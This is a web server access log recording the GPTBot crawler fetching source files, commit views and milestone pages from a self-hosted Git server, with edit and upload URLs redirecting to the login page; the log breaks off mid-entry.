+[17/Feb/2026:16:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11915] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" +[17/Feb/2026:16:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13019] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" +[17/Feb/2026:16:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11914] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" +[17/Feb/2026:16:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13018] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" +[17/Feb/2026:16:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" +[17/Feb/2026:16:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py?display=source" [Client 74.7.227.38] [Length 14291] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11919] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/docker-compose.yml" +[17/Feb/2026:16:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py?display=source" [Client 74.7.227.38] [Length 16170] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:09:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/services/geminiService.ts" +[17/Feb/2026:16:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/services/geminiService.ts" +[17/Feb/2026:16:09:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" +[17/Feb/2026:16:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/services/geminiService.ts" +[17/Feb/2026:16:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 23798] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:16:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2flocalpycs%2fpyimod01_archive.pyc" [Client 74.7.227.38] [Length 23823] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:16:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 23821] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/projects?q=&sort=reversealphabetically&state=open" [Client 74.7.227.38] [Length 7801] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/projects" +[17/Feb/2026:16:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 11211] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" +[17/Feb/2026:16:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8515] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" +[17/Feb/2026:16:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=leastissues&state=open" [Client 74.7.227.38] [Length 8504] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" +[17/Feb/2026:16:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:10:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:16:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:16:10:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:16:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:16:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" +[17/Feb/2026:16:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 11304] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:16:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.gitignore" [Client 74.7.227.38] [Length 11332] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" +[17/Feb/2026:16:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15562] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" +[17/Feb/2026:16:10:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/status.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/status.json" +[17/Feb/2026:16:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/status.json" +[17/Feb/2026:16:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=mostissues&state=open" [Client 74.7.227.38] [Length 8484] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostissues&state=closed" +[17/Feb/2026:16:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln?display=source" [Client 74.7.227.38] [Length 